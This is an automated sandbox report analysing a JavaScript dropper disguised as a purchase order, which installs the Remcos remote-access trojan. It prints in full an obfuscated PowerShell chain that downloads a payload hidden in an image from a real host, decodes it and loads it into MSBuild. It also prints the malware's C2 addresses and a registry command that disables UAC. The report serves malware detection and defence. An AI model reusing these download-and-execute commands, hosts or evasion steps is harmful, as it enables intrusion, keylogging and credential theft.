Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO_0099822111ORDER.js

Overview

General Information

Sample name:PO_0099822111ORDER.js
Analysis ID:1575117
MD5:9c23d2a7acc6acc81022dee56521c2ba
SHA1:40a93bafef8bfeec099f8f8f758336fe41a82a81
SHA256:9b9059af739b167db6afce5129997e489dbb7baa3af27c8da5a68d564c2ed84e
Tags:jsuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Paste sharing url in reverse order
Sigma detected: Powershell download and load assembly
Sigma detected: Remcos
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Maps a DLL or memory area into another process
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6884 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_0099822111ORDER.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • wscript.exe (PID: 7068 cmdline: "C:\Windows\System32\wscript.exe" C:\Windows\Temp\???2????4????4????5.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 7116 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGUAbQBvAHIAYQBuAGQAdQBtAHMAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJABjAG8AbgBlAG4AbwBzAGUAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQAgAD0AIAAkAGMAbwBuAGUAbgBvAHMAZQBzAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AZQBtAG8AcgBhAG4AZAB1AG0AcwApADsAJABlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQApADsAJAByAGUAcwBlAG4AdABpAHYAZQAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAbwB2AGUAcgBwAGEAYwBrACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHcAYQBsAGwAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAHMAZQBuAHQAaQB2AGUAKQA7ACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAbwB2AGUAcgBwAGEAYwBrACkAOwAkAHcAYQBsAGwAZQBkACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQBnAHQAIAAkAHcAYQBsAGwAZQBkADsAJAB3AGEAbABsAGUAZAAgACsAPQAgACQAcgBlAHMAZQBuAHQAaQB2AGUALgBMAGUAbgBnAHQAaAA7ACQAbABlAGcAYQB0AGkAbgBlACAAPQAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQAgACQAdwBhAGwAbABlAGQAOwAkAG0AZQB0AGUAbwByAGkAdABpAGMAIAA9ACAAJABlAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdwBhAGwAbABlAGQALAAgACQAbABlAGcAYQB0AGkAbgBlACkAOwAkAG8AcgBjAGEAcwAgAD0AIAAtAGoAbwBpAG4AIAAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAEwAZQBuAGcAdABoACkAXQA7ACQAcABlAHIAdgBhAHMAaQB2AGUAbgBlAHMAcwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbwByAGMAYQBzACkAOwAkAHMAeQBuAGkAegBlAHMAaQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAHAAZQByAHYAYQBzAGkAdgBlAG4AZQBzAHMAZQBzACkAOwAkAHYAdQBsAGMAYQBuAGkAcwBtAHMAIAA9ACAAWwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApADsAJAB2AHUAbABjAGEAbgBpAHMAbQBzAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAEAAKAAnADAALwB0AEIAYwBEAGkALwByAC8AZQBlAC4AZQB0AHMAYQBwAC8ALwA6AHMAcAB0AHQAaAAnACwAIAAnAGMAbwBuAHMAdABhAG4AdABhAG4AJwAsACAAJwBjAG8AbgBzAHQAYQBuAHQAYQBuACcALAAgACcAYwBvAG4AcwB0AGEAbgB0AGEAbgAnACwAIAAnAE0AUwBCAHUAaQBsAGQAJwAsACAAJwBjAG8AbgBzAHQAYQBuAHQAYQBuACcALAAgACcAYwBvAG4AcwB0AGEAbgB0AGEAbgAnACwAJwBjAG8AbgBzAHQAYQBuAHQAYQBuACcALAAnAGMAbwBuAHMAdABhAG4AdABhAG4AJwAsACcAYwBvAG4AcwB0AGEAbgB0AGEAbgAnACwAJwBjAG8AbgBzAHQAYQBuAHQAYQBuACcALAAnAGMAbwBuAHMAdABhAG4AdABhAG4AJwAsACcAMQAnACwAJwBjAG8AbgBzAHQAYQBuAHQAYQBuACcAKQApADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsA';$asphyxiation = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($forsakers));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $asphyxiation MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6372 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::FromBase64String($orcas);$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);$vulcanisms = [dnlib.IO.Home].GetMethod('VAI');$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • MSBuild.exe (PID: 4928 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
          • MSBuild.exe (PID: 7040 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
            • MSBuild.exe (PID: 5648 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\hxihjvnzszludrvreijvqeqsb" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
            • MSBuild.exe (PID: 5644 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\rrvrknybgidhfxrdnswxtjkjbwnl" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
            • MSBuild.exe (PID: 5808 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\bmbkdyiuuqvmpdfhediqewfskcwuitz" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["160.25.73.25:6426:1", "ruffella.duckdns.org:6426:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-QM0FWK", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000A.00000002.3636685740.0000000002BEF000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000A.00000002.3633339065.0000000000EF8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              Click to see the 13 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              10.2.MSBuild.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                10.2.MSBuild.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  10.2.MSBuild.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    10.2.MSBuild.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x6aaf8:$a1: Remcos restarted by watchdog!
                    • 0x6b070:$a3: %02i:%02i:%02i:%03i
                    10.2.MSBuild.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                    • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
                    • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                    • 0x64e04:$str_b2: Executing file:
                    • 0x65c3c:$str_b3: GetDirectListeningPort
                    • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                    • 0x65780:$str_b7: \update.vbs
                    • 0x64e2c:$str_b9: Downloaded file:
                    • 0x64e18:$str_b10: Downloading file:
                    • 0x64ebc:$str_b12: Failed to upload file:
                    • 0x65c04:$str_b13: StartForward
                    • 0x65c24:$str_b14: StopForward
                    • 0x656d8:$str_b15: fso.DeleteFile "
                    • 0x6566c:$str_b16: On Error Resume Next
                    • 0x65708:$str_b17: fso.DeleteFolder "
                    • 0x64eac:$str_b18: Uploaded file:
                    • 0x64e6c:$str_b19: Unable to delete:
                    • 0x656a0:$str_b20: while fso.FileExists("
                    • 0x65349:$str_c0: [Firefox StoredLogins not found]
                    Click to see the 7 entries

                    Other

                    SourceRuleDescriptionAuthorStrings
                    amsi64_6372.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                      Sigma Signatures

                      Networking

                      barindex
                      Sigma detected: Paste sharing url in reverse order
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::FromBase64String($orcas);$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);$vulcanisms = [dnlib.IO.Home].GetMethod('VAI');$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::F

                      System Summary

                      barindex
                      Sigma detected: Base64 Encoded PowerShell Command Detected
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGUAbQBvAHIAYQBuAGQAdQBtAHMAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJABjAG8AbgBlAG4AbwBzAGUAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQAgAD0AIAAkAGMAbwBuAGUAbgBvAHMAZQBzAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AZQBtAG8AcgBhAG4AZAB1AG0AcwApADsAJABlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQApADsAJAByAGUAcwBlAG4AdABpAHYAZQAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAbwB2AGUAcgBwAGEAYwBrACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHcAYQBsAGwAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAHMAZQBuAHQAaQB2AGUAKQA7ACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAbwB2AGUAcgBwAGEAYwBrACkAOwAkAHcAYQBsAGwAZQBkACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQBnAHQAIAAkAHcAYQBsAGwAZQBkADsAJAB3AGEAbABsAGUAZAAgACsAPQAgACQAcgBlAHMAZQBuAHQAaQB2AGUALgBMAGUAbgBnAHQAaAA7ACQAbABlAGcAYQB0AGkAbgBlACAAPQAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQAgACQAdwBhAGwAbABlAGQAOwAkAG0AZQB0AGUAbwByAGkAdABpAGMAIAA9ACAAJABlAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdwBhAGwAbABlAGQALAAgACQAbABlAGcAYQB0AGkAbgBlACkAOwAkAG8AcgBjAGEAcwAgAD0AIAAtAGoAbwBpAG4AIAAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAEwAZQBuAGcAdABoACkAXQA7ACQAcABlAHIAdgBhAHMAaQB2AGUAbgBlAHMAcwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbwByAGMAYQBzACkAOwAkAHMAeQBuAGkAegBlAHMAaQBzACAAPQAgAFsAUwB5AHM